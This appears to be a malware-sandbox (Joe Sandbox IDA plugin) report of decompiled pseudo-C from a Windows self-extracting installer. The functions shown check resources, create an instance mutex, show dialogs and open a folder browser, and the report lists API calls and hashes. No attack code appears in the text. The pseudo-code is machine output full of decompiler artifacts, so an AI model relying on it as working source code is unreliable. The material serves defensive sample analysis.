                                                                                                                                                                                                                                            							if(E00325C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0x328a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x328184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0x328a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E003236EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0x329a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0x329a34 & 0x00000100) == 0 || ( *0x328a38 & 0x00000001) != 0 || E003218A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E00326517(_t57, 0x7d6, _t34, E003219E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00322390(0x328a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E003244B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E0032468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0x328588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0x329a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E003244B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E003244B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0x328588);
                                                                                                                                                                                                                                            										 *0x329124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00322d48
                                                                                                                                                                                                                                            0x00322d59
                                                                                                                                                                                                                                            0x00322d84
                                                                                                                                                                                                                                            0x00322e1f
                                                                                                                                                                                                                                            0x00322e1f
                                                                                                                                                                                                                                            0x00322e2e
                                                                                                                                                                                                                                            0x00322e41
                                                                                                                                                                                                                                            0x00322e5a
                                                                                                                                                                                                                                            0x00322e62
                                                                                                                                                                                                                                            0x00322e6c
                                                                                                                                                                                                                                            0x00322e6c
                                                                                                                                                                                                                                            0x00322e75
                                                                                                                                                                                                                                            0x00322e77
                                                                                                                                                                                                                                            0x00322e77
                                                                                                                                                                                                                                            0x00322e84
                                                                                                                                                                                                                                            0x00322e8b
                                                                                                                                                                                                                                            0x00322e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322e96
                                                                                                                                                                                                                                            0x00322e96
                                                                                                                                                                                                                                            0x00322e9e
                                                                                                                                                                                                                                            0x00322ea2
                                                                                                                                                                                                                                            0x00322eba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322ece
                                                                                                                                                                                                                                            0x00322ede
                                                                                                                                                                                                                                            0x00322eed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322eed
                                                                                                                                                                                                                                            0x00322eef
                                                                                                                                                                                                                                            0x00322eef
                                                                                                                                                                                                                                            0x00322eef
                                                                                                                                                                                                                                            0x00322eef
                                                                                                                                                                                                                                            0x00322ea2
                                                                                                                                                                                                                                            0x00322e86
                                                                                                                                                                                                                                            0x00322e88
                                                                                                                                                                                                                                            0x00322e88
                                                                                                                                                                                                                                            0x00322e43
                                                                                                                                                                                                                                            0x00322e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322e48
                                                                                                                                                                                                                                            0x00322e30
                                                                                                                                                                                                                                            0x00322e30
                                                                                                                                                                                                                                            0x00322ef8
                                                                                                                                                                                                                                            0x00322f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322f01
                                                                                                                                                                                                                                            0x00322d8a
                                                                                                                                                                                                                                            0x00322d8f
                                                                                                                                                                                                                                            0x00322da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322da3
                                                                                                                                                                                                                                            0x00322dae
                                                                                                                                                                                                                                            0x00322db4
                                                                                                                                                                                                                                            0x00322dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322dca
                                                                                                                                                                                                                                            0x00322dd3
                                                                                                                                                                                                                                            0x00322df5
                                                                                                                                                                                                                                            0x00322e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322dd5
                                                                                                                                                                                                                                            0x00322dde
                                                                                                                                                                                                                                            0x00322de3
                                                                                                                                                                                                                                            0x00322e04
                                                                                                                                                                                                                                            0x00322e0a
                                                                                                                                                                                                                                            0x00322e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322e10
                                                                                                                                                                                                                                            0x00322dd3
                                                                                                                                                                                                                                            0x00322dbb
                                                                                                                                                                                                                                            0x00322da1
                                                                                                                                                                                                                                            0x00322d5b
                                                                                                                                                                                                                                            0x00322d5b
                                                                                                                                                                                                                                            0x00322d5d
                                                                                                                                                                                                                                            0x00322d69
                                                                                                                                                                                                                                            0x00322d6e
                                                                                                                                                                                                                                            0x00322f06
                                                                                                                                                                                                                                            0x00322f06
                                                                                                                                                                                                                                            0x00322f06
                                                                                                                                                                                                                                            0x00322d59
                                                                                                                                                                                                                                            0x00322f18

APIs
• memset.MSVCRT ref: 00322CD9
• memset.MSVCRT ref: 00322CE9
• memset.MSVCRT ref: 00322CF9
  • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
  • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
  • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
  • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
  • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
  • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
  • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
• CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00322D34
• SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00322D40
• CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00322DAE
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00322DBD
• CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00322E0A
  • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
  • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
Strings
Memory Dump Source
• Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
• Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
Similarity
• API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
• String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
• API String ID: 1002816675-2654900392
• Opcode ID: 8cf33790724bafb0aa42fb5da5227513ea3dfdb49cf7632bc46504c573a83f00
                                                                                                                                                                                                                                            • Instruction ID: dd50be38bbefcaadd788e2779d03cebec251736f5352019ead80cd8428eb3c0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cf33790724bafb0aa42fb5da5227513ea3dfdb49cf7632bc46504c573a83f00
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951E370600331BBE733AB21BD4AB7B369CEB45710F02442EF946D91D5DEB88C42D666
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E003234F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0x3291d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0x328584 = _t35;
                                                                                                                                                                                                                                            					E003243D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0x328184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E00324FE0, 0, 0, 0x328798);
                                                                                                                                                                                                                                            					 *0x32879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E003244B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0x32858c);
                                                                                                                                                                                                                                            					_t38 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E003244B9(_t38, 0x4b2, 0x321140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0x3291d8 = 1;
                                                                                                                                                                                                                                            						SetEvent( *0x32858c);
                                                                                                                                                                                                                                            						_t39 =  *0x32879c; // 0x0
                                                                                                                                                                                                                                            						E00323680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0x32858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0x32879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x003235f8
                                                                                                                                                                                                                                            0x00323617
                                                                                                                                                                                                                                            0x00323617
                                                                                                                                                                                                                                            0x00323623
                                                                                                                                                                                                                                            0x00323637
                                                                                                                                                                                                                                            0x0032363d
                                                                                                                                                                                                                                            0x00323642
                                                                                                                                                                                                                                            0x00323644
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323646
                                                                                                                                                                                                                                            0x00323652
                                                                                                                                                                                                                                            0x00323657
                                                                                                                                                                                                                                            0x00323658
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323658
                                                                                                                                                                                                                                            0x00323644
                                                                                                                                                                                                                                            0x0032351b
                                                                                                                                                                                                                                            0x0032351d
                                                                                                                                                                                                                                            0x0032354f
                                                                                                                                                                                                                                            0x00323553
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032355f
                                                                                                                                                                                                                                            0x00323565
                                                                                                                                                                                                                                            0x0032357c
                                                                                                                                                                                                                                            0x00323581
                                                                                                                                                                                                                                            0x00323584
                                                                                                                                                                                                                                            0x0032359b
                                                                                                                                                                                                                                            0x003235a1
                                                                                                                                                                                                                                            0x003235a7
                                                                                                                                                                                                                                            0x003235ad
                                                                                                                                                                                                                                            0x003235b3
                                                                                                                                                                                                                                            0x003235b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003235b8
                                                                                                                                                                                                                                            0x00323586
                                                                                                                                                                                                                                            0x00323588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323590
                                                                                                                                                                                                                                            0x00323524
                                                                                                                                                                                                                                            0x00323535
                                                                                                                                                                                                                                            0x00323541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00323535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00323541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 0032355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00321140,00000000,00000020,00000004), ref: 00323590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 003235C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 003235F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 003235F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00323610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00323617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00323623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00323637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00323671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 2406144884-3940384054
                                                                                                                                                                                                                                            • Opcode ID: dd96fc28ef8035ae991f597af440d52410ccf7ca3413715ef1f33aba9fe53021
                                                                                                                                                                                                                                            • Instruction ID: 76501b085d5a310539f6fe2409494d206b4d6be14667284c941bf3d9d2a4b469
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd96fc28ef8035ae991f597af440d52410ccf7ca3413715ef1f33aba9fe53021
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5431D430240321BBD7331F25FC8DE2B3A6DE786F11F20492DF606952A0CB799A12DB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E00324224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
	intOrPtr _t85;

	_t67 = __ecx;
	_t66 = LoadLibraryA("SHELL32.DLL");
	if(_t66 == 0) {
		_t63 = 0x4c2;
		L22:
		E003244B9(_t67, _t63, 0, 0, 0x10, 0);
		return 0;
	}
	_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
	_v12 = _t26;
	if(_t26 == 0) {
		L20:
		FreeLibrary(_t66);
		_t63 = 0x4c1;
		goto L22;
	}
	_t28 = GetProcAddress(_t66, 0xc3);
	_v20 = _t28;
	if(_t28 == 0) {
		goto L20;
	}
	_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
	_v16 = _t29;
	if(_t29 == 0) {
		goto L20;
	}
	_t76 =  *0x3288c0; // 0x0
	if(_t76 != 0) {
		L10:
		 *0x3287a0 = 0;
		_v52 = _t67;
		_v48 = 0;
		_v44 = 0;
		_v40 = 0x328598;
		_v36 = 1;
		_v32 = E00324200;
		_v28 = 0x3288c0;
		 *0x32a288( &_v52);
		_t32 =  *_v12();
		if(_t71 != _t71) {
			asm("int 0x29");
		}
		_v12 = _t32;
		if(_t32 != 0) {
			 *0x32a288(_t32, 0x3288c0);
			 *_v16();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
			if( *0x3288c0 != 0) {
				E00321680(0x3287a0, 0x104, 0x3288c0);
			}
			 *0x32a288(_v12);
			 *_v20();
			if(_t71 != _t71) {
				asm("int 0x29");
			}
		}
		FreeLibrary(_t66);
		_t85 =  *0x3287a0; // 0x0
		return 0 | _t85 != 0x00000000;
	} else {
		GetTempPathA(0x104, 0x3288c0);
		_t61 = 0x3288c0;
		_t4 =  &(_t61[1]); // 0x3288c1
		_t65 = _t4;
		do {
			_t42 =  *_t61;
			_t61 =  &(_t61[1]);
		} while (_t42 != 0);
		_t5 = _t61 - _t65 + 0x3288c0; // 0x651181
		_t44 = CharPrevA(0x3288c0, _t5);
		_v8 = _t44;
		if( *_t44 == 0x5c &&  *(CharPrevA(0x3288c0, _t44)) != 0x3a) {
			 *_v8 = 0;
		}
		goto L10;
	}
}




























                                                                                                                                                                                                                                            0x003242a5
                                                                                                                                                                                                                                            0x003242aa
                                                                                                                                                                                                                                            0x003242aa
                                                                                                                                                                                                                                            0x003242ad
                                                                                                                                                                                                                                            0x003242ad
                                                                                                                                                                                                                                            0x003242af
                                                                                                                                                                                                                                            0x003242b0
                                                                                                                                                                                                                                            0x003242b6
                                                                                                                                                                                                                                            0x003242c2
                                                                                                                                                                                                                                            0x003242c8
                                                                                                                                                                                                                                            0x003242ce
                                                                                                                                                                                                                                            0x003242e4
                                                                                                                                                                                                                                            0x003242e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003242ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00324236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0032424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00324263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0032427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,003288C0,?,00000001), ref: 0032429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(003288C0,00651181,?,00000001), ref: 003242C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(003288C0,00000000,?,00000001), ref: 003242D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00324391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003243A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 7f0a3ac8cb48dd77b13c751164898c2a4666f579b4c034f423b31201b44b5709
                                                                                                                                                                                                                                            • Instruction ID: c19d8ff9efc20780400f71342bfadb596bd35987077103719f09c3a76cbf60fc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f0a3ac8cb48dd77b13c751164898c2a4666f579b4c034f423b31201b44b5709
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA412978A01324EFD723AF74FC84AAE7BB8EB49744F05456DEA41A7291CB758C02C761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00322773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
